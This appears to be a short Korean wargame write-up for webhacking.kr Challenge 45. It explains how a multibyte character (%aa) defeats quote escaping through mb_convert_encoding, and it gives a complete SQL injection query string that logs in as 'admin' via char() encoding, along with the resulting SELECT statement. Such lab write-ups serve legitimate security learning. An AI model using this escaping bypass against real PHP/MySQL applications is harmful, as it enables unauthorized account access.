본문 바로가기

WarGame/webhacking.kr

[webhacking.kr] Challenge 45 :: SQL Injection ( mb_convert_encoding )




Summary

  • Challenge 50 과 같은 문제로 mb_convert_encoding()의 취약점을 이용합니다. 
    ( 참고 : http://limjunyoung.tistory.com/101)
  • Challenge 50은 $_GET[id]에만 "union" 문자열을 필터링한 것에 반해, Challenge 45는 $_GET[id]와 $_GET[pw] 모두 "union" 문자열을 필터링하고 있습니다.




▼ Challenge 50은 다음과 같습니다.


 PHP 코드는 다음과 같습니다.


자세한 설명은 Challenge 50(http://limjunyoung.tistory.com/101)을 참고하시기 바랍니다.


$_GET[id]와 $_GET[pw] 모두 "union" 문자열을 필터링하고 있기 때문에, $_GET[id] 파라미터에서 "admin"을 출력하도록 만들겠습니다.

최종 Query String과 실제 SELECT 구문은 다음과 같습니다.


?id=%aa%27%20or%20id=char(97,100,109,105,110)%23&pw=guest
cs

SELECT id FROM member WHERE id='%aa' or id=char(97,100,109,105,110)#' and pw=md5('guest');
cs